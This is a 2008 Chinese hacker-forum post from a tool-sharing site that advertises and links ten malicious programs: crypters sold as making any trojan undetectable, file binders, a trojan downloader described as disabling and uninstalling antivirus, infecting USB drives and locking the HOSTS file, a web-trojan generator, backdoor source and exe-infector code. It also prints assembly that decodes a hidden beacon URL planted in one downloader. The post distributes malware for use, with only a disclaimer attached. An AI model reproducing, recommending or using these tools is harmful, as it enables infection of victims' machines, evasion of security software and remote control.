资源分享 2008-6-29 13:33
[06.30]黑客精品软件更新[软件兵器库整理]
[color=#FF0000][size=3]友情提示:[/size][/color]
1. 此更新合集由软件兵器库整理,[color=#0000FF]图片上传到免费空间,可能观看速度有些慢,请耐心等待下[/color]!
2. 所有软件均来自网络,我们保证您下载的软件无任何捆绑,至于有无后门请自行检测!
3. 软件上传于免费网盘, 点击进入下载地址后等待10秒中 即可出现下载地址进行下载!
4. 对于使用工具造成的一切违法行为一律与本站无关!
5. 欢迎访问软件兵器库 专注收集更新国内外最新黑软! 地址: [url]http://hacktools.uu1001.com[/url]
6. 关于无法打开某些VB的免杀软件.捆绑器等等 请看: [url]http://hacktools.uu1001.com/read.php?tid=755[/url]
[img]http://img1.ylmf.com/attachment/Day_080410/148_250883_9a5a7116518b778.gif[/img]
[quote]
[color=#66CC00][size=2]今日更新列表:[/size][/color]
[color=#FF0000]1. [捆绑器] ArexX Simple Crypter V2汉化版
2. [捆绑器] Rude Surprise (捆绑器)
3. [免杀软件] Cigicigi Crypter v1.0
4. [免杀软件] W4nNa-D!E Crypter
5. [免杀软件] Moruk_creW_Crypter
6. [下载者] 终结者下载器[去后门版]
7. [下载者] 护马使者{080629}
8. [木马后门] 神专用VIP网马生成器
9. [程序源代码] SHIFT后门功能版原码
10. [程序源代码] 感染exe运行DLL [/color]
[/quote]
[img]http://img1.ylmf.com/attachment/Day_080410/148_250883_9a5a7116518b778.gif[/img]
[quote]
1. [color=#FF0000]ArexX Simple Crypter V2汉化版[/color]
软件大小: 486.87 KB
软件说明:
原版下载: [url=http://hacktools.uu1001.com/read.php?tid=878]http://hacktools.uu1001.com/read.php?tid=878[/url]
程序截图:
[img]http://ab.uu1001.com/uu/uu_0806_6/hacktools_2_1_43e19af96626cfa.jpg[/img]
[url=http://www.live-share.com/files/331949/ArexX_Simple_Crypter_V2___.rar.html][color=#0000FF][size=4]点击进入下载页面[/size][/color][/url]
2. [color=#FF0000]Rude Surprise (捆绑器) [/color]
软件大小: 236.59 KB
软件说明:
效果自测~~~~~~~~
程序截图:
[img]http://ab.uu1001.com/uu/uu_0806_6/hacktools_8_1_112aa61a7cb22ad.jpg[/img]
[url=http://www.live-share.com/files/331953/Rude_Surprise__binder_.rar.html][color=#0000FF][size=4]点击进入下载页面[/size][/color][/url]
3. [color=#FF0000]Cigicigi Crypter v1.0[/color]
软件大小: 1.04 MB
软件说明:
[+]You can make any virus/trojan undedected.(scantime and runtime)
[+]You can prevent your programs.
[+]You can use it to change programs's icons.
Usage :
-------
[1]Click "Find File" button to select the file that you want to crypt.
[2]If file contains EOF data,click on checkbox.(Some trojans have this;Poison Ivy,Bifrost,Flux,etc.)
[3]Select your password..This tool will create a different copy for each password.
[4]If you want to change icon :
a)Press "Find Icon" button to select icon.
b)You can select default icon by clicking "Default Icon" button.
Icon Hunter :
-------------
You can get any program's icon with this tool.
Firstly click "Icon Hunter" button,after that select the application to get icons from.
All icons will be extracted to current directory.
[5]Press "Create File" button,and select where to save crypted file.
[6]Your crypted file is ready,now you can use it..
Properties :
[+]Cigicigi File Crypter uses XOR encryption.
[+]Uses "user level unhooking".So firewalls can't say that the file is infected.
[+]Cigicigi File Crypter supports EOF data.So you can also crypt Flux,Bifrost,Poison Ivy,etc.. servers.
程序截图:
[img]http://ab.uu1001.com/uu/uu_0806_6/hacktools_8_1_c201ca97d90c126.jpg[/img]
[url=http://www.live-share.com/files/331952/Cigicigi_Crypter_v1.0.rar.html][color=#0000FF][size=4]点击进入下载页面[/size][/color][/url]
4. [color=#FF0000]W4nNa-D!E Crypter [/color]
软件大小: 380.54 KB
软件说明:
效果自测~~~~~~~~~~
程序截图:
[img]http://ab.uu1001.com/uu/uu_0806_6/hacktools_8_1_7f5263fa50f4cdf.jpg[/img]
[url=http://www.live-share.com/files/331946/W4nNa-D_E_Crypter.rar.html][color=#0000FF][size=4]点击进入下载页面[/size][/color][/url]
5. [color=#FF0000]Moruk_creW_Crypter [/color]
软件大小: 325.73 KB
软件说明:
一个私密版本,效果自测!
程序截图:
[img]http://ab.uu1001.com/uu/uu_0806_6/hacktools_8_1_7966e3058dbb92c.jpg[/img]
[url=http://www.live-share.com/files/331945/Moruk_creW_Crypter.rar.html][color=#0000FF][size=4]点击进入下载页面[/size][/color][/url]
[/quote]
[img]http://img1.ylmf.com/attachment/Day_080410/148_250883_9a5a7116518b778.gif[/img]
[quote]
6. [color=#FF0000]终结者下载器[去后门版] [/color]
软件大小: 624.55 KB
软件说明:
作者: 叫我女王
终结者下载器,采用C++编写,极大了减少了体积,加壳后才4K,拥有众多VIP下载者的超强功能。
功能介绍中的所有功能都可以使用,没有任何限制!
附加说明:
程序中有多数可疑代码。为了防止不必要的纠纷。。。
这里清楚掉原有的可疑代码。。。
如果你在逆向的时候发现有大量的nop那个就是了。。。
附上解码代码:
//把文件的$1064位置的加密字符串--到$00结尾的字符串复制到代码种进行解码
//得到结果:[url]http://1.d5x8.cn/tj.asp[/url]
function DeCode(lpBuffer1, lpBuffer2: PChar): Integer; cdecl;
const
arg_0 = $4;
arg_4 = $8;
asm
leave
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, esi
or ecx, 0FFFFFFFFh
xor eax, eax
xor ebx, ebx
xor edx, edx
repne sca**
not ecx
dec ecx
test ecx, ecx
jle @@loc_13142048
@@loc_1314201B:
mov al, [edx+esi+1]
mov cl, [edx+esi]
add al, 6
sub cl, 8
and al, 0Fh
mov edi, esi
shl cl, 4
add al, cl
mov ecx, [esp+0Ch+arg_4]
mov [ebx+ecx], al
inc ebx
inc edx
or ecx, 0FFFFFFFFh
xor eax, eax
inc edx
repne sca**
not ecx
dec ecx
cmp edx, ecx
jl @@loc_1314201B
@@loc_13142048:
mov eax, [esp+0Ch+arg_4]
pop edi
pop esi
and byte ptr [ebx+eax], 0
xor eax, eax
pop ebx
retn
end;
procedure TForm1.Button1Click(Sender: TObject);
const
// 1064
StrUrl = #$7E#$82#$7F#$7E#$7F#$7E#$7F#$7A#$7B#$84#$7A#$89 +
#$7A#$89#$7B#$7B#$7A#$88#$7E#$7E#$7B#$7F#$7F#$82 +
#$7B#$82#$7A#$88#$7E#$7D#$7E#$88#$7A#$89#$7F#$7E +
#$7E#$84#$7A#$88#$7E#$7B#$7F#$7D#$7F#$7A;
var
szBuffer: Array[0..46] Of Char;
szDeBuffer: Array[0..46] Of Char;
begin
ZeroMemory(@szBuffer, SizeOf(szBuffer));
DeCode(StrUrl, @szDeBuffer);
Edit1.Text := PChar(@szDeBuffer);
end;
程序截图:
[img]http://ab.uu1001.com/uu/uu_0806_6/hacktools_10_1_623d5e99d19d502.jpg[/img]
[url=http://www.live-share.com/files/332049/____________.rar.html][color=#0000FF][size=4]点击进入下载页面[/size][/color][/url]
7. [color=#FF0000]护马使者{080629} [/color]
软件大小: 232.95 KB
软件说明:
软件名称:护马使者 集{动态防护+下载器}于一体
版本号:08/06/29 通过 卡巴 瑞星 金山 最新病毒库检测
注:本程序未使用任何HOOK钩子,不会与你的小马产生任何冲突,可放心使用
主要功能及特色:(养马人(插件)的好帮手)
----------------------------------------------------------------------------
(* 注:本程序只可用来研究,不可用来做违法事宜,作者不承担任何后果 *)
新增功能:障碍移除(可移除更多的竟争对手 下载者 或 木马 重启后生效)
使用方法和无限下载基本类似,在TXT文件里填入要移除文件的完整路径,此功能
适合有一定基础的用户使用,首先要分析对方程序运行后的各个文件的完整路径
(*注意:不可错移系统文件哦*),填入TXT上传空间即可使用,程序运行5分钟后
开始执行移除工作,具体使用方法参考 (主程序) 文件,新手搞明白方可使用!
移除名单:(收集的是一些流行的下载者,觉得妨碍自己的程序可自行进行增减)
见移除名单文件(del.txt)!!!
动态防护:(尽量为保护自身和小马而战斗)
大部分专杀是通过,网站下载,邮件,QQ,MSN 等传来传去的,所以本程序会动态
监视 C D E F G H 六大硬盘分区里的 EXE CMD COM BAT PIF SCR 六大可执行程序
扩展名,如果进行 下载 新建 改名 复制 等操作 (包括用 "迅雷" 下载,如果下
载的是RAR压缩包,解压或直接从RAR压缩包中运行即 删除或失效),发现是专杀则
立即查杀,删除,这样即在专杀没运行前就被删除,用户也就没有机会在运行专杀。
防护名单:(目前只反杀了如下程序,新版继续添加,服务端可进行远程自升级)
见防护名单文件!!!
----------------------------------------------------------------------------
传统功能:
1.程序提供 10项下载 及 无限下载 ,填写时记得选择延时下载的时间。
2.本程序服务端具有远程更新功能,10项下载 及 无限下载 均可升级自身。
3.程序采用双进程守护方式运行,用户可随机选择 5 - 8 位不同长度的进程名。
4.程序仍然采用感染 硬盘分区 和 U盘分区 的功能,同时破AUTO包括NTFS的免疫。
5.程序运行后,会关闭一次QQ程序,彻底封锁QQ医生,否则 QQ.exe 会不定时的跳出来进行查杀。
6.程序提供3个U盘伪装文件填写,使用则钩选后填入你想填的欺骗文字(最长8个中文),会在对方U盘里生成。
7.程序对老版本的卡巴进行改时间跳过 主动防御,新版本的则直接调用 卸载程序卸载,瑞星则直接进行卸载操作。
8.程序仍然采用网页关键字查杀方式,以便对在线 查毒,杀毒,下载专杀,等关键字进行屏蔽,尽可能的保护自己。
9.程序采用独占方式锁定系统启动配置文件,防止XDELBOX这类程序进行重启删除,防不了的加入 "防护名单" 删除。
10.程序运行后清空系统的HOSTS文件,然后以独占方式锁定,防止用户或某些软件写HOSTS屏蔽网址,影响下载功能。
11.提供隐藏弹窗统计功能,程序运行5分钟后,弹出你指定的统计地址,30秒后自动关闭。
12.屏蔽系统 安全模式,印像劫持,自删除,等等功能,不在多说了,用户可自行测试。
使用注意事项:
见主程序!!!
程序截图:
[img]http://ab.uu1001.com/uu/uu_0806_6/hacktools_10_1_e25fa4eafd2a859.jpg[/img]
[url=http://www.live-share.com/files/331937/_____080629_.rar.html][color=#0000FF][size=4]点击进入下载页面[/size][/color][/url]
8. [color=#FF0000]神专用VIP网马生成器 [/color]
软件大小: 545.8 KB
软件说明:
效果大家自测吧.2个版本!
程序截图:
[img]http://ab.uu1001.com/uu/uu_0806_6/hacktools_10_1_989bff901df40cc.jpg[/img]
[img]http://ab.uu1001.com/uu/uu_0806_6/hacktools_10_1_20d1c2ca917a480.jpg[/img]
[url=http://www.live-share.com/files/331935/___VIP______vb_e_.rar.html][color=#0000FF][size=4]点击进入下载页面[/size][/color][/url]
9. [color=#FF0000]SHIFT后门功能版原码 [/color]
软件大小: 7 KB
软件说明:
功能可以加强,后门也可以自己定义, VB代码
程序截图:
[img]http://ab.uu1001.com/uu/uu_0806_6/hacktools_12_1_b4cc7d5a500591a.jpg[/img]
[url=http://dd.uu1001.com/download.php?predomain=hacktools&host=hacktools.uu1001.com&pid=tpc&tid=857&aid=1201&down_hash=dmRcendnM2FtUmBRNkQuNnYSZXJieHxnI1JbdnEBInQxIGEnYWZufGBRAnJuXwIN][color=#0000FF][size=4]点击进入下载页面[/size][/color][/url]
10. [color=#FF0000]感染exe运行DLL [/color]
软件大小: 43 KB
软件说明:
VC代码
黑防一期的感染exe调用DLL
程序截图:
暂无
[url=http://dd.uu1001.com/download.php?predomain=hacktools&host=hacktools.uu1001.com&pid=tpc&tid=863&aid=1211&down_hash=dmRcendnM2FtUmBRNkQuNnYSZXJieHxnI1JbdnEBInQxIGEnYWZufGBRAnJuXwIN][color=#0000FF][size=4]点击进入下载页面[/size][/color][/url]
[/quote]
[img]http://img1.ylmf.com/attachment/Day_080410/148_250883_9a5a7116518b778.gif[/img]
